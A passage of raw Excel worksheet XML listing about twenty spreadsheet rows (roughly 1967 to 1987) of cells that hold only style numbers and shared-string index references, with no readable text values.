      <c r="L1967" s="46"/>
      <c r="M1967" s="46"/>
      <c r="N1967" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1967" s="46"/>
      <c r="P1967" s="46"/>
      <c r="Q1967" s="46"/>
      <c r="R1967" s="46"/>
      <c r="S1967" s="46"/>
      <c r="T1967" s="46"/>
      <c r="U1967" s="46"/>
      <c r="V1967" s="46"/>
      <c r="W1967" s="46"/>
      <c r="X1967" s="46"/>
      <c r="Y1967" s="46"/>
      <c r="Z1967" s="46"/>
      <c r="AA1967" s="46"/>
      <c r="AB1967" s="46"/>
      <c r="AC1967" s="46"/>
      <c r="AD1967" s="46"/>
      <c r="AE1967" s="46"/>
      <c r="AF1967" s="46"/>
      <c r="AG1967" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1967" s="46"/>
      <c r="AI1967" s="46"/>
      <c r="AJ1967" s="46"/>
    </row>
    <row r="1968" spans="1:36">
      <c r="A1968" s="42">
        <v>1967</v>
      </c>
      <c r="B1968" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1968" s="42" t="s">
        <v>2933</v>
      </c>
      <c r="D1968" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1968" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1968" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1968" s="46"/>
      <c r="H1968" s="46"/>
      <c r="I1968" s="46"/>
      <c r="J1968" s="46"/>
      <c r="K1968" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1968" s="46"/>
      <c r="M1968" s="46"/>
      <c r="N1968" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1968" s="46"/>
      <c r="P1968" s="46"/>
      <c r="Q1968" s="46"/>
      <c r="R1968" s="46"/>
      <c r="S1968" s="46"/>
      <c r="T1968" s="46"/>
      <c r="U1968" s="46"/>
      <c r="V1968" s="46"/>
      <c r="W1968" s="46"/>
      <c r="X1968" s="46"/>
      <c r="Y1968" s="46"/>
      <c r="Z1968" s="46"/>
      <c r="AA1968" s="46"/>
      <c r="AB1968" s="46"/>
      <c r="AC1968" s="46"/>
      <c r="AD1968" s="46"/>
      <c r="AE1968" s="46"/>
      <c r="AF1968" s="46"/>
      <c r="AG1968" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1968" s="46"/>
      <c r="AI1968" s="46"/>
      <c r="AJ1968" s="46"/>
    </row>
    <row r="1969" spans="1:36">
      <c r="A1969" s="42">
        <v>1968</v>
      </c>
      <c r="B1969" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1969" s="42" t="s">
        <v>2934</v>
      </c>
      <c r="D1969" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1969" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1969" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1969" s="46"/>
      <c r="H1969" s="46"/>
      <c r="I1969" s="46"/>
      <c r="J1969" s="46"/>
      <c r="K1969" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1969" s="46"/>
      <c r="M1969" s="46"/>
      <c r="N1969" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1969" s="46"/>
      <c r="P1969" s="46"/>
      <c r="Q1969" s="46"/>
      <c r="R1969" s="46"/>
      <c r="S1969" s="46"/>
      <c r="T1969" s="46"/>
      <c r="U1969" s="46"/>
      <c r="V1969" s="46"/>
      <c r="W1969" s="46"/>
      <c r="X1969" s="46"/>
      <c r="Y1969" s="46"/>
      <c r="Z1969" s="46"/>
      <c r="AA1969" s="46"/>
      <c r="AB1969" s="46"/>
      <c r="AC1969" s="46"/>
      <c r="AD1969" s="46"/>
      <c r="AE1969" s="46"/>
      <c r="AF1969" s="46"/>
      <c r="AG1969" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1969" s="46"/>
      <c r="AI1969" s="46"/>
      <c r="AJ1969" s="46"/>
    </row>
    <row r="1970" spans="1:36">
      <c r="A1970" s="42">
        <v>1969</v>
      </c>
      <c r="B1970" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1970" s="42" t="s">
        <v>2935</v>
      </c>
      <c r="D1970" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1970" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1970" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1970" s="46"/>
      <c r="H1970" s="46"/>
      <c r="I1970" s="46"/>
      <c r="J1970" s="46"/>
      <c r="K1970" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1970" s="46"/>
      <c r="M1970" s="46"/>
      <c r="N1970" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1970" s="46"/>
      <c r="P1970" s="46"/>
      <c r="Q1970" s="46"/>
      <c r="R1970" s="46"/>
      <c r="S1970" s="46"/>
      <c r="T1970" s="46"/>
      <c r="U1970" s="46"/>
      <c r="V1970" s="46"/>
      <c r="W1970" s="46"/>
      <c r="X1970" s="46"/>
      <c r="Y1970" s="46"/>
      <c r="Z1970" s="46"/>
      <c r="AA1970" s="46"/>
      <c r="AB1970" s="46"/>
      <c r="AC1970" s="46"/>
      <c r="AD1970" s="46"/>
      <c r="AE1970" s="46"/>
      <c r="AF1970" s="46"/>
      <c r="AG1970" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1970" s="46"/>
      <c r="AI1970" s="46"/>
      <c r="AJ1970" s="46"/>
    </row>
    <row r="1971" spans="1:36">
      <c r="A1971" s="42">
        <v>1970</v>
      </c>
      <c r="B1971" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1971" s="42" t="s">
        <v>2936</v>
      </c>
      <c r="D1971" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1971" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1971" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1971" s="46"/>
      <c r="H1971" s="46"/>
      <c r="I1971" s="46"/>
      <c r="J1971" s="46"/>
      <c r="K1971" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1971" s="46"/>
      <c r="M1971" s="46"/>
      <c r="N1971" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1971" s="46"/>
      <c r="P1971" s="46"/>
      <c r="Q1971" s="46"/>
      <c r="R1971" s="46"/>
      <c r="S1971" s="46"/>
      <c r="T1971" s="46"/>
      <c r="U1971" s="46"/>
      <c r="V1971" s="46"/>
      <c r="W1971" s="46"/>
      <c r="X1971" s="46"/>
      <c r="Y1971" s="46"/>
      <c r="Z1971" s="46"/>
      <c r="AA1971" s="46"/>
      <c r="AB1971" s="46"/>
      <c r="AC1971" s="46"/>
      <c r="AD1971" s="46"/>
      <c r="AE1971" s="46"/>
      <c r="AF1971" s="46"/>
      <c r="AG1971" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1971" s="46"/>
      <c r="AI1971" s="46"/>
      <c r="AJ1971" s="46"/>
    </row>
    <row r="1972" spans="1:36">
      <c r="A1972" s="42">
        <v>1971</v>
      </c>
      <c r="B1972" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1972" s="42" t="s">
        <v>2937</v>
      </c>
      <c r="D1972" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1972" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1972" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1972" s="46"/>
      <c r="H1972" s="46"/>
      <c r="I1972" s="46"/>
      <c r="J1972" s="46"/>
      <c r="K1972" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1972" s="46"/>
      <c r="M1972" s="46"/>
      <c r="N1972" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1972" s="46"/>
      <c r="P1972" s="46"/>
      <c r="Q1972" s="46"/>
      <c r="R1972" s="46"/>
      <c r="S1972" s="46"/>
      <c r="T1972" s="46"/>
      <c r="U1972" s="46"/>
      <c r="V1972" s="46"/>
      <c r="W1972" s="46"/>
      <c r="X1972" s="46"/>
      <c r="Y1972" s="46"/>
      <c r="Z1972" s="46"/>
      <c r="AA1972" s="46"/>
      <c r="AB1972" s="46"/>
      <c r="AC1972" s="46"/>
      <c r="AD1972" s="46"/>
      <c r="AE1972" s="46"/>
      <c r="AF1972" s="46"/>
      <c r="AG1972" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1972" s="46"/>
      <c r="AI1972" s="46"/>
      <c r="AJ1972" s="46"/>
    </row>
    <row r="1973" spans="1:36">
      <c r="A1973" s="42">
        <v>1972</v>
      </c>
      <c r="B1973" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1973" s="42" t="s">
        <v>2938</v>
      </c>
      <c r="D1973" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1973" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1973" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1973" s="46"/>
      <c r="H1973" s="46"/>
      <c r="I1973" s="46"/>
      <c r="J1973" s="46"/>
      <c r="K1973" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1973" s="46"/>
      <c r="M1973" s="46"/>
      <c r="N1973" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1973" s="46"/>
      <c r="P1973" s="46"/>
      <c r="Q1973" s="46"/>
      <c r="R1973" s="46"/>
      <c r="S1973" s="46"/>
      <c r="T1973" s="46"/>
      <c r="U1973" s="46"/>
      <c r="V1973" s="46"/>
      <c r="W1973" s="46"/>
      <c r="X1973" s="46"/>
      <c r="Y1973" s="46"/>
      <c r="Z1973" s="46"/>
      <c r="AA1973" s="46"/>
      <c r="AB1973" s="46"/>
      <c r="AC1973" s="46"/>
      <c r="AD1973" s="46"/>
      <c r="AE1973" s="46"/>
      <c r="AF1973" s="46"/>
      <c r="AG1973" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1973" s="46"/>
      <c r="AI1973" s="46"/>
      <c r="AJ1973" s="46"/>
    </row>
    <row r="1974" spans="1:36">
      <c r="A1974" s="42">
        <v>1973</v>
      </c>
      <c r="B1974" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1974" s="42" t="s">
        <v>2939</v>
      </c>
      <c r="D1974" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1974" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1974" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1974" s="46"/>
      <c r="H1974" s="46"/>
      <c r="I1974" s="46"/>
      <c r="J1974" s="46"/>
      <c r="K1974" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1974" s="46"/>
      <c r="M1974" s="46"/>
      <c r="N1974" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1974" s="46"/>
      <c r="P1974" s="46"/>
      <c r="Q1974" s="46"/>
      <c r="R1974" s="46"/>
      <c r="S1974" s="46"/>
      <c r="T1974" s="46"/>
      <c r="U1974" s="46"/>
      <c r="V1974" s="46"/>
      <c r="W1974" s="46"/>
      <c r="X1974" s="46"/>
      <c r="Y1974" s="46"/>
      <c r="Z1974" s="46"/>
      <c r="AA1974" s="46"/>
      <c r="AB1974" s="46"/>
      <c r="AC1974" s="46"/>
      <c r="AD1974" s="46"/>
      <c r="AE1974" s="46"/>
      <c r="AF1974" s="46"/>
      <c r="AG1974" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1974" s="46"/>
      <c r="AI1974" s="46"/>
      <c r="AJ1974" s="46"/>
    </row>
    <row r="1975" spans="1:36">
      <c r="A1975" s="42">
        <v>1974</v>
      </c>
      <c r="B1975" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1975" s="42" t="s">
        <v>2940</v>
      </c>
      <c r="D1975" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1975" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1975" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1975" s="46"/>
      <c r="H1975" s="46"/>
      <c r="I1975" s="46"/>
      <c r="J1975" s="46"/>
      <c r="K1975" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1975" s="46"/>
      <c r="M1975" s="46"/>
      <c r="N1975" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1975" s="46"/>
      <c r="P1975" s="46"/>
      <c r="Q1975" s="46"/>
      <c r="R1975" s="46"/>
      <c r="S1975" s="46"/>
      <c r="T1975" s="46"/>
      <c r="U1975" s="46"/>
      <c r="V1975" s="46"/>
      <c r="W1975" s="46"/>
      <c r="X1975" s="46"/>
      <c r="Y1975" s="46"/>
      <c r="Z1975" s="46"/>
      <c r="AA1975" s="46"/>
      <c r="AB1975" s="46"/>
      <c r="AC1975" s="46"/>
      <c r="AD1975" s="46"/>
      <c r="AE1975" s="46"/>
      <c r="AF1975" s="46"/>
      <c r="AG1975" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1975" s="46"/>
      <c r="AI1975" s="46"/>
      <c r="AJ1975" s="46"/>
    </row>
    <row r="1976" spans="1:36">
      <c r="A1976" s="42">
        <v>1975</v>
      </c>
      <c r="B1976" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1976" s="42" t="s">
        <v>2941</v>
      </c>
      <c r="D1976" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1976" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1976" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1976" s="46"/>
      <c r="H1976" s="46"/>
      <c r="I1976" s="46"/>
      <c r="J1976" s="46"/>
      <c r="K1976" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1976" s="46"/>
      <c r="M1976" s="46"/>
      <c r="N1976" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1976" s="46"/>
      <c r="P1976" s="46"/>
      <c r="Q1976" s="46"/>
      <c r="R1976" s="46"/>
      <c r="S1976" s="46"/>
      <c r="T1976" s="46"/>
      <c r="U1976" s="46"/>
      <c r="V1976" s="46"/>
      <c r="W1976" s="46"/>
      <c r="X1976" s="46"/>
      <c r="Y1976" s="46"/>
      <c r="Z1976" s="46"/>
      <c r="AA1976" s="46"/>
      <c r="AB1976" s="46"/>
      <c r="AC1976" s="46"/>
      <c r="AD1976" s="46"/>
      <c r="AE1976" s="46"/>
      <c r="AF1976" s="46"/>
      <c r="AG1976" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1976" s="46"/>
      <c r="AI1976" s="46"/>
      <c r="AJ1976" s="46"/>
    </row>
    <row r="1977" spans="1:36">
      <c r="A1977" s="42">
        <v>1976</v>
      </c>
      <c r="B1977" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1977" s="42" t="s">
        <v>2942</v>
      </c>
      <c r="D1977" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1977" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1977" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1977" s="46"/>
      <c r="H1977" s="46"/>
      <c r="I1977" s="46"/>
      <c r="J1977" s="46"/>
      <c r="K1977" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1977" s="46"/>
      <c r="M1977" s="46"/>
      <c r="N1977" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1977" s="46"/>
      <c r="P1977" s="46"/>
      <c r="Q1977" s="46"/>
      <c r="R1977" s="46"/>
      <c r="S1977" s="46"/>
      <c r="T1977" s="46"/>
      <c r="U1977" s="46"/>
      <c r="V1977" s="46"/>
      <c r="W1977" s="46"/>
      <c r="X1977" s="46"/>
      <c r="Y1977" s="46"/>
      <c r="Z1977" s="46"/>
      <c r="AA1977" s="46"/>
      <c r="AB1977" s="46"/>
      <c r="AC1977" s="46"/>
      <c r="AD1977" s="46"/>
      <c r="AE1977" s="46"/>
      <c r="AF1977" s="46"/>
      <c r="AG1977" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1977" s="46"/>
      <c r="AI1977" s="46"/>
      <c r="AJ1977" s="46"/>
    </row>
    <row r="1978" spans="1:36">
      <c r="A1978" s="42">
        <v>1977</v>
      </c>
      <c r="B1978" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1978" s="42" t="s">
        <v>2943</v>
      </c>
      <c r="D1978" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1978" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1978" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1978" s="46"/>
      <c r="H1978" s="46"/>
      <c r="I1978" s="46"/>
      <c r="J1978" s="46"/>
      <c r="K1978" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1978" s="46"/>
      <c r="M1978" s="46"/>
      <c r="N1978" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1978" s="46"/>
      <c r="P1978" s="46"/>
      <c r="Q1978" s="46"/>
      <c r="R1978" s="46"/>
      <c r="S1978" s="46"/>
      <c r="T1978" s="46"/>
      <c r="U1978" s="46"/>
      <c r="V1978" s="46"/>
      <c r="W1978" s="46"/>
      <c r="X1978" s="46"/>
      <c r="Y1978" s="46"/>
      <c r="Z1978" s="46"/>
      <c r="AA1978" s="46"/>
      <c r="AB1978" s="46"/>
      <c r="AC1978" s="46"/>
      <c r="AD1978" s="46"/>
      <c r="AE1978" s="46"/>
      <c r="AF1978" s="46"/>
      <c r="AG1978" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1978" s="46"/>
      <c r="AI1978" s="46"/>
      <c r="AJ1978" s="46"/>
    </row>
    <row r="1979" spans="1:36">
      <c r="A1979" s="42">
        <v>1978</v>
      </c>
      <c r="B1979" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1979" s="42" t="s">
        <v>2944</v>
      </c>
      <c r="D1979" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1979" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1979" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1979" s="46"/>
      <c r="H1979" s="46"/>
      <c r="I1979" s="46"/>
      <c r="J1979" s="46"/>
      <c r="K1979" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1979" s="46"/>
      <c r="M1979" s="46"/>
      <c r="N1979" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1979" s="46"/>
      <c r="P1979" s="46"/>
      <c r="Q1979" s="46"/>
      <c r="R1979" s="46"/>
      <c r="S1979" s="46"/>
      <c r="T1979" s="46"/>
      <c r="U1979" s="46"/>
      <c r="V1979" s="46"/>
      <c r="W1979" s="46"/>
      <c r="X1979" s="46"/>
      <c r="Y1979" s="46"/>
      <c r="Z1979" s="46"/>
      <c r="AA1979" s="46"/>
      <c r="AB1979" s="46"/>
      <c r="AC1979" s="46"/>
      <c r="AD1979" s="46"/>
      <c r="AE1979" s="46"/>
      <c r="AF1979" s="46"/>
      <c r="AG1979" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1979" s="46"/>
      <c r="AI1979" s="46"/>
      <c r="AJ1979" s="46"/>
    </row>
    <row r="1980" spans="1:36">
      <c r="A1980" s="42">
        <v>1979</v>
      </c>
      <c r="B1980" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1980" s="42" t="s">
        <v>2945</v>
      </c>
      <c r="D1980" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1980" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1980" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1980" s="46"/>
      <c r="H1980" s="46"/>
      <c r="I1980" s="46"/>
      <c r="J1980" s="46"/>
      <c r="K1980" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1980" s="46"/>
      <c r="M1980" s="46"/>
      <c r="N1980" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1980" s="46"/>
      <c r="P1980" s="46"/>
      <c r="Q1980" s="46"/>
      <c r="R1980" s="46"/>
      <c r="S1980" s="46"/>
      <c r="T1980" s="46"/>
      <c r="U1980" s="46"/>
      <c r="V1980" s="46"/>
      <c r="W1980" s="46"/>
      <c r="X1980" s="46"/>
      <c r="Y1980" s="46"/>
      <c r="Z1980" s="46"/>
      <c r="AA1980" s="46"/>
      <c r="AB1980" s="46"/>
      <c r="AC1980" s="46"/>
      <c r="AD1980" s="46"/>
      <c r="AE1980" s="46"/>
      <c r="AF1980" s="46"/>
      <c r="AG1980" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1980" s="46"/>
      <c r="AI1980" s="46"/>
      <c r="AJ1980" s="46"/>
    </row>
    <row r="1981" spans="1:36">
      <c r="A1981" s="42">
        <v>1980</v>
      </c>
      <c r="B1981" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1981" s="42" t="s">
        <v>2946</v>
      </c>
      <c r="D1981" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1981" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1981" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1981" s="46"/>
      <c r="H1981" s="46"/>
      <c r="I1981" s="46"/>
      <c r="J1981" s="46"/>
      <c r="K1981" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1981" s="46"/>
      <c r="M1981" s="46"/>
      <c r="N1981" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1981" s="46"/>
      <c r="P1981" s="46"/>
      <c r="Q1981" s="46"/>
      <c r="R1981" s="46"/>
      <c r="S1981" s="46"/>
      <c r="T1981" s="46"/>
      <c r="U1981" s="46"/>
      <c r="V1981" s="46"/>
      <c r="W1981" s="46"/>
      <c r="X1981" s="46"/>
      <c r="Y1981" s="46"/>
      <c r="Z1981" s="46"/>
      <c r="AA1981" s="46"/>
      <c r="AB1981" s="46"/>
      <c r="AC1981" s="46"/>
      <c r="AD1981" s="46"/>
      <c r="AE1981" s="46"/>
      <c r="AF1981" s="46"/>
      <c r="AG1981" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1981" s="46"/>
      <c r="AI1981" s="46"/>
      <c r="AJ1981" s="46"/>
    </row>
    <row r="1982" spans="1:36">
      <c r="A1982" s="42">
        <v>1981</v>
      </c>
      <c r="B1982" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1982" s="42" t="s">
        <v>2947</v>
      </c>
      <c r="D1982" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1982" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1982" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1982" s="46"/>
      <c r="H1982" s="46"/>
      <c r="I1982" s="46"/>
      <c r="J1982" s="46"/>
      <c r="K1982" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1982" s="46"/>
      <c r="M1982" s="46"/>
      <c r="N1982" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1982" s="46"/>
      <c r="P1982" s="46"/>
      <c r="Q1982" s="46"/>
      <c r="R1982" s="46"/>
      <c r="S1982" s="46"/>
      <c r="T1982" s="46"/>
      <c r="U1982" s="46"/>
      <c r="V1982" s="46"/>
      <c r="W1982" s="46"/>
      <c r="X1982" s="46"/>
      <c r="Y1982" s="46"/>
      <c r="Z1982" s="46"/>
      <c r="AA1982" s="46"/>
      <c r="AB1982" s="46"/>
      <c r="AC1982" s="46"/>
      <c r="AD1982" s="46"/>
      <c r="AE1982" s="46"/>
      <c r="AF1982" s="46"/>
      <c r="AG1982" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1982" s="46"/>
      <c r="AI1982" s="46"/>
      <c r="AJ1982" s="46"/>
    </row>
    <row r="1983" spans="1:36">
      <c r="A1983" s="42">
        <v>1982</v>
      </c>
      <c r="B1983" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1983" s="42" t="s">
        <v>2948</v>
      </c>
      <c r="D1983" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1983" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1983" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1983" s="46"/>
      <c r="H1983" s="46"/>
      <c r="I1983" s="46"/>
      <c r="J1983" s="46"/>
      <c r="K1983" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1983" s="46"/>
      <c r="M1983" s="46"/>
      <c r="N1983" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1983" s="46"/>
      <c r="P1983" s="46"/>
      <c r="Q1983" s="46"/>
      <c r="R1983" s="46"/>
      <c r="S1983" s="46"/>
      <c r="T1983" s="46"/>
      <c r="U1983" s="46"/>
      <c r="V1983" s="46"/>
      <c r="W1983" s="46"/>
      <c r="X1983" s="46"/>
      <c r="Y1983" s="46"/>
      <c r="Z1983" s="46"/>
      <c r="AA1983" s="46"/>
      <c r="AB1983" s="46"/>
      <c r="AC1983" s="46"/>
      <c r="AD1983" s="46"/>
      <c r="AE1983" s="46"/>
      <c r="AF1983" s="46"/>
      <c r="AG1983" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1983" s="46"/>
      <c r="AI1983" s="46"/>
      <c r="AJ1983" s="46"/>
    </row>
    <row r="1984" spans="1:36">
      <c r="A1984" s="42">
        <v>1983</v>
      </c>
      <c r="B1984" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1984" s="42" t="s">
        <v>2949</v>
      </c>
      <c r="D1984" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1984" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1984" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1984" s="46"/>
      <c r="H1984" s="46"/>
      <c r="I1984" s="46"/>
      <c r="J1984" s="46"/>
      <c r="K1984" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1984" s="46"/>
      <c r="M1984" s="46"/>
      <c r="N1984" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1984" s="46"/>
      <c r="P1984" s="46"/>
      <c r="Q1984" s="46"/>
      <c r="R1984" s="46"/>
      <c r="S1984" s="46"/>
      <c r="T1984" s="46"/>
      <c r="U1984" s="46"/>
      <c r="V1984" s="46"/>
      <c r="W1984" s="46"/>
      <c r="X1984" s="46"/>
      <c r="Y1984" s="46"/>
      <c r="Z1984" s="46"/>
      <c r="AA1984" s="46"/>
      <c r="AB1984" s="46"/>
      <c r="AC1984" s="46"/>
      <c r="AD1984" s="46"/>
      <c r="AE1984" s="46"/>
      <c r="AF1984" s="46"/>
      <c r="AG1984" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1984" s="46"/>
      <c r="AI1984" s="46"/>
      <c r="AJ1984" s="46"/>
    </row>
    <row r="1985" spans="1:36">
      <c r="A1985" s="42">
        <v>1984</v>
      </c>
      <c r="B1985" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1985" s="42" t="s">
        <v>2950</v>
      </c>
      <c r="D1985" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1985" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1985" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1985" s="46"/>
      <c r="H1985" s="46"/>
      <c r="I1985" s="46"/>
      <c r="J1985" s="46"/>
      <c r="K1985" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1985" s="46"/>
      <c r="M1985" s="46"/>
      <c r="N1985" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1985" s="46"/>
      <c r="P1985" s="46"/>
      <c r="Q1985" s="46"/>
      <c r="R1985" s="46"/>
      <c r="S1985" s="46"/>
      <c r="T1985" s="46"/>
      <c r="U1985" s="46"/>
      <c r="V1985" s="46"/>
      <c r="W1985" s="46"/>
      <c r="X1985" s="46"/>
      <c r="Y1985" s="46"/>
      <c r="Z1985" s="46"/>
      <c r="AA1985" s="46"/>
      <c r="AB1985" s="46"/>
      <c r="AC1985" s="46"/>
      <c r="AD1985" s="46"/>
      <c r="AE1985" s="46"/>
      <c r="AF1985" s="46"/>
      <c r="AG1985" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1985" s="46"/>
      <c r="AI1985" s="46"/>
      <c r="AJ1985" s="46"/>
    </row>
    <row r="1986" spans="1:36">
      <c r="A1986" s="42">
        <v>1985</v>
      </c>
      <c r="B1986" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1986" s="42" t="s">
        <v>2951</v>
      </c>
      <c r="D1986" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1986" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1986" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1986" s="46"/>
      <c r="H1986" s="46"/>
      <c r="I1986" s="46"/>
      <c r="J1986" s="46"/>
      <c r="K1986" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1986" s="46"/>
      <c r="M1986" s="46"/>
      <c r="N1986" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1986" s="46"/>
      <c r="P1986" s="46"/>
      <c r="Q1986" s="46"/>
      <c r="R1986" s="46"/>
      <c r="S1986" s="46"/>
      <c r="T1986" s="46"/>
      <c r="U1986" s="46"/>
      <c r="V1986" s="46"/>
      <c r="W1986" s="46"/>
      <c r="X1986" s="46"/>
      <c r="Y1986" s="46"/>
      <c r="Z1986" s="46"/>
      <c r="AA1986" s="46"/>
      <c r="AB1986" s="46"/>
      <c r="AC1986" s="46"/>
      <c r="AD1986" s="46"/>
      <c r="AE1986" s="46"/>
      <c r="AF1986" s="46"/>
      <c r="AG1986" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1986" s="46"/>
      <c r="AI1986" s="46"/>
      <c r="AJ1986" s="46"/>
    </row>
    <row r="1987" spans="1:36">
      <c r="A1987" s="42">
        <v>1986</v>
      </c>
      <c r="B1987" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1987" s="42" t="s">
        <v>2952</v>
      </c>
      <c r="D1987" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1987" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1987" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1987" s="46"/>
      <c r="H1987" s="46"/>
